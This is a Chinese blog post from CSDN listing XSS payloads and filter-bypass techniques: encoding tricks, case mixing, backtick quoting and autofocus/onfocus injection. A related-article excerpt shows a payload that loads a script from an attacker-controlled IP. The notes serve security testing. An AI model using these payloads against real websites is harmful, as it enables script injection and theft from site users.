xss过滤绕过方法总结

最新推荐文章于 2022-04-03 18:52:40 发布
最新推荐文章于 2022-04-03 18:52:40 发布
阅读量9.3k 收藏 20
点赞数 3
分类专栏: xss
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jinhezhai/article/details/108603911
版权

xss注入常用语句、

1.<script>alert(1)</script>
2.<img src="#" onmouseover="alert(11)">
3.<img src="#" onerror="alert('xss')">
4.<svg onload=alert(1)>
5.<a href=javascript:alert(1)>

1.尝试双写绕过
2.大小写绕过、
3.js编码#unicode js的一种编码方式。
4.html实体编码
命名实体:以&开头,以分号结尾的,例如"<“的编码是”&#lt;"
字符编码:十进制,十六进制ascii码值或unicode字符编码,样式为"&#数值;"例如“<”可以被编码为“&#060;”和&#x3c;
5.url编码
也就是进行两次url的全编码;
6.可以使用空格.换行,tab键或者/**/,/*!a*/,的形式绕过关键词的检测.

下面介绍几个实例:
1.如果被过滤单引号
可以尝试重音符混淆

<IMG SRC=`javascript:alert(“RSnake says, ‘XSS’”)`>

2.如果尖括号和圆括号被过滤
如果在html标签内部可以使用

" autofocus οnfοcus=alert(1) x="

构造为

<input value="1" autofocus οnfοcus=alert 1  x="">

xxxxxxxxxx" name=javasCript:alert%281%29 autofocus οnfοcus=location=this.name xx

也可以这样对小括号进行双重url编码。绕过圆括号。
注:如果在html实体外部,还没想到咋绕过。
附上两个链接:xss绕过
xss绕过尖括号

本人已自闭
关注
  • 3
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
记录几种XSS绕过方式1
08-03
记录几种XSS绕过方式一.服务端全局替换为空的特性比如某站正则 过滤了onerror 过滤了script 这些 但是“ 或者 ‘ 这这种符号会变成空可以绕过,例
XSS绕过方式
OKAY_TC的博客
04-16 2827
记录挖洞过程中所遇到的XSS绕过 1. 过滤了<>尖括号: //原理:利用html以及js伪协议,当用户打开页面缓冲页面会自动获取焦点,从而触发js代码生成script标签,达到目的。 autofocus onfocus=location="javasCript:s=document.createElement("script");s.src="http://<ip>...
【应用安全——XSS过滤圆括号、尖括号绕过
热门推荐
Fly_鹏程万里
02-22 4万+
先看下程序大概写法: &lt;?php header("X-XSS-Protection:0"); $out = $_GET['code']; $out = str_replace("&lt;","&amp;lt;",$out); $out = str_replace("&gt;","&amp;gt;",$out); $out = str_replace(&quot
xss绕过尖括号和双括号_强防御下的XSS绕过思路(一)白名单篇
weixin_39532754的博客
12-27 5137
前 言很多白帽子在挖掘XSS漏洞的时候,往往会遇到一个问题,就是明明发现这里的过滤有缺陷,但是就是没法成功的进行构造利用。可能会由于自身对XSS绕过的局限性思维,往往只会反复的去尝试各种不同 payload代码,寄希望于其中某一个可以绕过过滤。但是在遇到强有力的XSS防御措施下,往往只能是竹篮打水一场空。鉴于这种情况,这里主要分3个章节来简单的分享一些XSS绕过思路。【第一节】 白名单限...
第十三节 利用CSS特性绕过XSS过滤-01
09-15
第十三节 利用CSS特性绕过XSS过滤-01
XSS-Game level 10
wangyuxiang946的博客
07-08 1万+
第十关过滤尖括号 > < , 并且隐藏了输入框 , 使用事件绕过,并使输入框取消隐藏 先看源码 , 这一关有两个参数 , 参数 keyword 使用htmlspecialchars() 转译后 直接在页面输出 , 攻击难度较大 第二个参数 t_sort , 过滤尖括号 <> 后 拼接到 value值 , 可以使用 事件绕过 传递 t_sort 参数 , 插入点击事件 , 左侧第一个双引号用来闭合 value属性的左双引号 ?t_sort=" o...
我的渗透笔记之XSS绕过技巧
xf555er的博客
03-03 9684
1、单引号、双引号和尖括号之间的闭合。 有些标签例如,构造的payload应该为” >,那么组成的标签为<input value=""><script>alert(1)</script>" 2、尖括号被转义,利用注释符号和一些属性事件. 例如,构造payload为" οnclick=alert(1)//,组成的标签为<input value="" o...
xss 总结
0ffs3t
10-18 4632
document.getElementById("y").innerHTML="xxxxxxxxxx"; document.write("xxxxxxxxxxxx"); $("#y").html("xxxxxxx"); aa.innerHTML="xxxxxxxxxxxx";  这种情况下。xxxxx只能使用 这种方式来触发JS。
(27)【xss绕过】一般测试步骤、绕过方法:触发事件、干扰、编码……
04-03 5511
XSS绕过-合集】
xss绕过尖括号和双括号_xss防御及绕过-小记1
weixin_29315091的博客
12-23 2886
XSS搞安全的应该都很熟悉。本次并不是说其原理,仅是分享下在测试过程中遇到的案例。本人小白一枚,所以案例大佬们看着可能非常简单,就当是记录下自己笔记吧,不喜勿喷哈。。关于xss的防御,基本上都是采用输入过滤,输出编码。最近做的一个项目中的某个模块中,进行了输入过滤,采用跳转的形式。比如遇到<>或alert,响应包就会302跳转到固定网址。遇到这种黑名单的可以尝试各种绕过。有些输入是在i...
自动绕过 XSS过滤器_Java_代码_相关文件_下载
07-12
绕过 XSS 过滤器 概述 snuck 是一个自动工具,其目标是通过基于反射上下文的专门注入来显着测试给定的 XSS 过滤器。这种方法采用 Selenium 来驱动 Web 浏览器来重现攻击者和受害者的行为。 更多详情、使用方法,请下载后阅读README.md文件
第十二节 利用IE特性绕过XSS过滤-01
09-15
第十二节 利用IE特性绕过XSS过滤-01
第十节 绕过过滤domain为空的XSS-01
09-15
第十节 绕过过滤domain为空的XSS-01
第十六节 unicode绕过过滤触发XSS-01
09-15
第十六节 unicode绕过过滤触发XSS-01
第十二节 XSS 过滤绕过-01
09-15
第十二节 XSS 过滤绕过-01
XSSBypass:XSS绕过技术
05-17
XSS绕过 XSS绕过技术,带来乐趣和收益。 尝试使用XSS漏洞逐行绕过Web应用程序安全性XSS过滤器。
神经网络与量子计算的交叉研究.pptx
04-19
神经网络与量子计算的交叉研究.pptx
非线性端口 MEMS 麦克风的 Simscape 模型.zip
04-19
1.版本:matlab2014/2019a/2021a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。
用于超声成像和仿真的 MATLAB 工具箱.zip
最新发布
04-19
1.版本:matlab2014/2019a/2021a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。
xss 空格过滤绕过
07-27
XSS(跨站脚本攻击)是一种常见的网络安全漏洞,攻击者通过在网页中注入恶意脚本来获取用户的敏感信息或执行恶意操作。为了防止XSS攻击,通常会对用户输入的内容进行过滤和转义处理。 在绕过空格过滤的情况下,攻击者可以尝试以下方法绕过安全措施: 1. 使用HTML实体编码:攻击者可以使用HTML实体编码来绕过空格过滤。例如,将空格字符替换为其对应的HTML实体编码(例如,将空格替换为` `或` `)。 2. 使用特殊字符:攻击者可以使用特殊字符来绕过空格过滤。例如,使用不可见字符、全角空格或其他类似的字符。 3. 绕过过滤器规则:攻击者可以尝试绕过已实施的过滤器规则。这可能需要对输入进行深入了解,并找到规则中的漏洞或限制。 重要的是要意识到,绕过空格过滤只是XSS攻击的一种方式,还有其他许多方法可以进行XSS攻击。为了保护网站免受XSS攻击,建议采取综合的安全措施,包括输入验证、输出编码、内容安全策略等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值